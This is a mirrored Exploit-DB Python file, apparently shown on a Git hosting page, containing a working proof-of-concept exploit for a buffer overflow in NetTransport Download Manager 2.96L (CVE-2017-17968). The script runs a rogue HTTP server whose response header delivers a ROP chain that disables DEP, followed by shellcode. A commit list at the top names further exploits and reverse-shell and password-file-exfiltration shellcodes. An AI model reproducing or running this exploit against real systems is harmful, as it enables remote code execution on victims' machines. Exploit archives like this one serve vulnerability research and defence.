bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/43408.py
Offensive Security a7ddd8282b DB: 2018-01-11 
28 changes to exploits/shellcodes

Multiple CPUs - Information Leak Using Speculative Execution
Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check

Jungo Windriver 12.5.1 - Privilege Escalation
DiskBoss Enterprise 8.8.16 - Buffer Overflow
HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)
HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)

Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)
Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
Muviko 1.1 - SQL Injection
WordPress Plugin Events Calendar - 'event_id' SQL Injection
WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery
WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation
WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation
WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting

BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)
BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)
BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)
BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)
FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)

BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)
Linux/x86 - execve /bin/dash Shellcode (30 bytes)
Alpha - /bin/sh Shellcode (80 bytes)
Alpha - execve() Shellcode (112 bytes)
Alpha - setuid() Shellcode (156 bytes)
BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
2018-01-11 05:02:24 +00:00

121 lines
No EOL
4.5 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/pythion
# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
# Software Link: http://xi-soft.com/downloads/NXSetup_x86.zip
# Exploit Author: Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://xi-soft.com/default.htm
# Category: webapps
# Impact: Code execution
#1. Description
#
#A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
#
#2. Proof of Concept
#
#!/usr/bin/pythion
def main():
host = "192.168.205.131"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
#Disabling DEP by VirtualProtect()
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x10001653, # POP EAX # RETN [libssl.dll]
0x00485ed3,# MOV EAX,DWORD PTR DS:[ECX] # POP EDI # POP ESI # POP EBP # POP ECX # RETN 0x04 [NetTransport.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00496596, # XCHG EAX,ESI # RETN 0x0A [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x004ea919, # POP EBP # RETN [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x4141, # Filler (RETN offset compensation)
0x004608df, # & push esp # ret [NetTransport.exe]
0x0045e75f, # POP EBX # RETN [NetTransport.exe]
0x00000201, # 0x00000201-> ebx
0x00554dbc, # POP ECX # RETN [NetTransport.exe]
0x00000040, # 0x00000040-> edx
0x00499c92, # XOR EDX,EDX # RETN 0x04 [NetTransport.exe]
0x0041254c, # ADC EDX,ECX # POP EBX # ADD ESP,0C # RETN 0x04 [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x0054e559, # POP ECX # RETN [NetTransport.exe]
0x41414141, # Filler (RETN offset compensation)
0x10004b93, # &Writable location [libssl.dll]
0x0050343f, # POP EDI # RETN [NetTransport.exe]
0x00487073, # RETN (ROP NOP) [NetTransport.exe]
0x10001653, # POP EAX # RETN [libssl.dll]
0x90909090, # nop
0x00486f78, # PUSHAD # RETN [NetTransport.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#Tiny calc.exe shellcode
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
MaxSize = 60000
EAX_overwrite= "A"*16739 #Always trigger a crash at EAX
#EIP 004E7828
#evil = "\x28\x78\x4E\x90"
rop = rop_chain
nops = "\x90"*10
pads = "C"*(MaxSize - len(EAX_overwrite + rop + nops + shellcode))
payload = EAX_overwrite + rop + nops + shellcode + pads
buffer = "HTTP/1.1 200 " + payload + "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
cl.close()
s.close()
if __name__ == '__main__':
import struct
import socket
main()
#3. Solution:
#
#No solution available at the moment.
Reference in a new issue View git blame Copy permalink